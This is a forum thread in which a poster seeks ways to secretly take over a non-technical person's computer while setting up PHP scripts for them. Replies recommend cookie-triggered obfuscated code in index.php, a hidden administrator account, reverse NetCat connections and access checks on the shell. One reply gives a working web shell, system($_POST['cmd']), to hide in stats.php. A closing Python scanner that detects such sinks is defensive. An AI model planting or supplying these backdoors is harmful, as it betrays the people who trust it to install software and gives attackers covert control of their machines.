Author Topic: How to take over a computer with PHP  (Read 5563 times)

Offline m0l0ko

  • Peasant
  • *
  • Posts: 129
  • Cookies: -4
How to take over a computer with PHP
« on: February 18, 2013, 05:40:56 am »
Let's say you are assigned the task of setting up some PHP scripts on the local Apache server of a non-programming-savvy person and you decide to take advantage of the opportunity to gain remote control of the computer. How would you go about doing it?

Here's what I'm thinking: I use file_get_contents to download a .txt file from a remote server. This .txt file will contain instructions; most of the time the first instruction will be DO NOTHING or something, which tells the script to ignore the instructions. Then when I decide to, I will change it to ACTIVE, which will tell the script to read the next few lines, which will be commands that get fed into the exec() function. The script will read this instruction file every time it loads (in other words, every time the person on the other end uses my scripts). I will also hook it up to the eval() function so I can feed it blocks of PHP code. Like this I can get the script to do anything, even download and execute a remote administration tool if need be.

I'm not a very advanced PHP programmer; that's the best I could come up with so far. The downside is that I can only feed instructions to it every time the person runs the script (which in my situation won't be very often). Is there a way I can make the script open up a back door to Apache so I can get the remote Apache server to run scripts at any time? Is there a way I can gain shell access to the computer?
« Last Edit: February 18, 2013, 05:47:15 am by m0l0ko »

Offline relax

  • Sir
  • ***
  • Posts: 562
  • Cookies: 114
  • The one and only
Re: How to take over a computer with PHP
« Reply #1 on: February 18, 2013, 10:45:03 am »
google php shells....

Offline DaNePaLI

  • Peasant
  • *
  • Posts: 55
  • Cookies: 12
  • Forever n00b
Re: How to take over a computer with PHP
« Reply #2 on: February 18, 2013, 11:38:29 am »
Well, if it's the non-programming-savvy person, you could even install the remote administration tools initially rather than doing it through the PHP script later on. Plus you could add a hidden administrator account and set up the remote desktop connection to the computer.

Or you could hide the obfuscated PHP code somewhere in the file which your end user would access the most (e.g. index.php). Something that would trigger based on some POST or COOKIE. Don't use GET (e.g. index.php?shell=1) as the HTTP logs would keep the full URL with all the query parameters. An easy method would be to use COOKIE (e.g. if COOKIE['shell'] is set, the shell access would be given to you).

Offline m0l0ko

  • Peasant
  • *
  • Posts: 129
  • Cookies: -4
Re: How to take over a computer with PHP
« Reply #3 on: February 19, 2013, 12:03:41 am »
> Well, if it's the non-programming-savvy person, you could even install the remote administration tools initially rather than doing it through the PHP script later on. Plus you could add a hidden administrator account and set up the remote desktop connection to the computer.
>
> Or you could hide the obfuscated PHP code somewhere in the file which your end user would access the most (e.g. index.php). Something that would trigger based on some POST or COOKIE. Don't use GET (e.g. index.php?shell=1) as the HTTP logs would keep the full URL with all the query parameters. An easy method would be to use COOKIE (e.g. if COOKIE['shell'] is set, the shell access would be given to you).

Yeah, I could install a RAT but the problem is I'm not a strong enough programmer to write a crypter so I'd have to use a commercial one, and it would be detected and deleted by his antivirus within a few days unless I regularly recrypted and updated the program. My PHP scripts on the other hand will be ignored by antivirus software (at least I think they will, I'm a Linux user so I have very little experience with Windows antiviruses).

Can you elaborate on what you said about $_POST[] and $_COOKIE[]? I read about using $_GET[] to feed commands into a PHP backdoor but his Apache web server won't be facing the internet, so I can't point my browser to his IP or anything like that. I could configure his server to face the web and he wouldn't notice but I don't wanna go making his comp vulnerable to hackers. I can think of plenty of ways to take over a web-facing Apache server in this case, but I'd prefer to keep it as a local web server. How would I use cookies to open a shell? How would I set the value to 'shell' when I want to open the shell?

With the method I mentioned in the OP (getting the script to download a txt file containing instructions, then execute the instructions), the Apache server doesn't need to be web-facing.

EDIT: Let's say you did make the Apache server face the web (so I can access the web page remotely) and I set up a backdoor shell, how would you go about protecting it so that only you can use the shell (and not random skiddies who find the web page)? Would you just password protect it somehow, or is there a better way?
« Last Edit: February 19, 2013, 12:08:55 am by m0l0ko »

Offline callahan

  • /dev/null
  • *
  • Posts: 13
  • Cookies: -9
Re: How to take over a computer with PHP
« Reply #4 on: February 19, 2013, 12:16:10 am »
Make a script that will execute your command with shell_exec() passed via POST or whatever you choose.

Offline Silentz

  • Peasant
  • *
  • Posts: 64
  • Cookies: 12
Re: How to take over a computer with PHP
« Reply #5 on: February 19, 2013, 12:20:46 am »

For your needs you really need to just download a (clean) PHP Shell and upload it to the server. It's kinda long making one if there are plenty available.


Then just reverse connect using NetCat if you have firewall issues.

> EDIT: Let's say you did make the Apache server face the web (so I can access the web page remotely) and I set up a backdoor shell, how would you go about protecting it so that only you can use the shell (and not random skiddies who find the web page)? Would you just password protect it somehow, or is there a better way?


IP Whitelist:


Code:
$ipaddress = $_SERVER['REMOTE_ADDR'];

if ($ipaddress == 'XXX.XXX.XXX.XXX') {
    // Action for allowed IP addresses
} else {
    // Action for all other IP addresses
    echo 'You are not authorized here.';
    echo "<br />IP Address: " . $_SERVER['REMOTE_ADDR'];
    exit;
}

And then add your password protect if you want to.
« Last Edit: February 19, 2013, 12:24:48 am by Silentz »

Offline m0l0ko

  • Peasant
  • *
  • Posts: 129
  • Cookies: -4
Re: How to take over a computer with PHP
« Reply #6 on: February 19, 2013, 02:10:56 am »
> IP Whitelist:

Problem is I change my IP regularly when I restart my router. Is there a way to convert your no-ip hostname into your IP with PHP?

Thanks for the info, I'll look into reverse netcat.

Offline techb

  • Soy Sauce Feeler
  • Global Moderator
  • King
  • *
  • Posts: 2350
  • Cookies: 345
  • Aliens do in fact wear hats.
Re: How to take over a computer with PHP
« Reply #7 on: February 19, 2013, 03:30:08 am »
End-users do NOT have PHP installed on their shit. Use C or something more common. You will need something more than PHP. Unless you are targeting Linux users, even then you won't get anywhere because of sudo, su, super user shite.
>>>import this
-----------------------------

Offline Silentz

  • Peasant
  • *
  • Posts: 64
  • Cookies: 12
Re: How to take over a computer with PHP
« Reply #8 on: February 19, 2013, 12:04:33 pm »
> End-users do NOT have PHP installed on their shit. Use C or something more common. You will need something more than PHP. Unless you are targeting Linux users, even then you won't get anywhere because of sudo, su, super user shite.


OP says: "Lets say you are assigned the task of setting up some PHP scripts on the local apache server"
« Last Edit: February 19, 2013, 12:05:25 pm by Silentz »

Offline callahan

  • /dev/null
  • *
  • Posts: 13
  • Cookies: -9
Re: How to take over a computer with PHP
« Reply #9 on: February 19, 2013, 11:07:47 pm »
> Problem is I change my IP regularly when I restart my router. Is there a way to convert your no-ip hostname into your IP with PHP?
>
> Thanks for the info, I'll look into reverse netcat.

Instead of making the access based on IP whitelisting make it based on user-agent.

Offline jay755

  • /dev/null
  • *
  • Posts: 9
  • Cookies: -1
Re: How to take over a computer with PHP
« Reply #10 on: February 21, 2013, 10:07:53 am »
Oops: This would only work when the webserver was internet facing.

Code:
<?php
system
($_POST['cmd']);
?>

Just put that in stats.php or something and enjoy :) .


Of course this is a very simple example which can be detected very fast, but it will get you going.


If you need any help just let me know.



« Last Edit: February 21, 2013, 10:12:57 am by jay755 »
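
For anyone auditing a server for the patterns discussed in this thread (request input, or a remotely fetched file, passed to exec(), system() or eval()), a static check is sketched below. It is an added example and not part of any post above; the function names, the sink list and the benign sample are assumptions made for illustration.

```python
import re

# PHP functions that run OS commands or PHP code (sink list is an assumption).
SINKS = "exec|shell_exec|system|passthru|popen|proc_open|eval|assert"
# Sink call and its arguments up to the end of the statement. The lookbehind
# skips methods and other functions such as $db->exec() or curl_exec().
SINK_CALL = re.compile(r"(?<![\w>$])(" + SINKS + r")\s*\(([^;]*)", re.I)
REQUEST = re.compile(r"\$_(?:GET|POST|COOKIE|REQUEST)\b")
REMOTE_FETCH = re.compile(r"file_get_contents\s*\(\s*['\"](?:https?|ftp)://", re.I)
ASSIGN = re.compile(r"(\$\w+)\s*=(?![=>])\s*([^;]+);")
VAR = re.compile(r"\$\w+")

def tainted_vars(source):
    """Map each variable to the untrusted origin its value derives from."""
    taint = {}
    for var, expr in ASSIGN.findall(source):
        if REQUEST.search(expr):
            taint[var] = "request input"
        elif REMOTE_FETCH.search(expr):
            taint[var] = "remote fetch"
        else:  # propagate through plain assignments, e.g. $b = trim($a);
            for name in VAR.findall(expr):
                if name in taint:
                    taint[var] = taint[name]
    return taint

def scan_php(source):
    """Return sorted (line, sink, origin) tuples for sinks fed untrusted data."""
    taint = tainted_vars(source)
    findings = set()
    for match in SINK_CALL.finditer(source):
        sink, args = match.group(1).lower(), match.group(2)
        line = source.count("\n", 0, match.start()) + 1
        if REQUEST.search(args):
            findings.add((line, sink, "request input"))
        for name in VAR.findall(args):
            if name in taint:
                findings.add((line, sink, taint[name]))
    return sorted(findings)

# The snippet as posted in reply #10 (note the line break before the
# parenthesis), and a constructed benign page for contrast.
POSTED = "<?php\nsystem\n($_POST['cmd']);\n?>"
BENIGN = "<?php\n$t = file_get_contents('tpl/home.html');\necho htmlspecialchars($_POST['name']);\n"

if __name__ == "__main__":
    for label, src in (("posted", POSTED), ("benign", BENIGN)):
        print(label, scan_php(src))
```

Pattern matching of this kind does not see through obfuscated code, so an empty result is inconclusive; compare deployed files against a known-good copy as well.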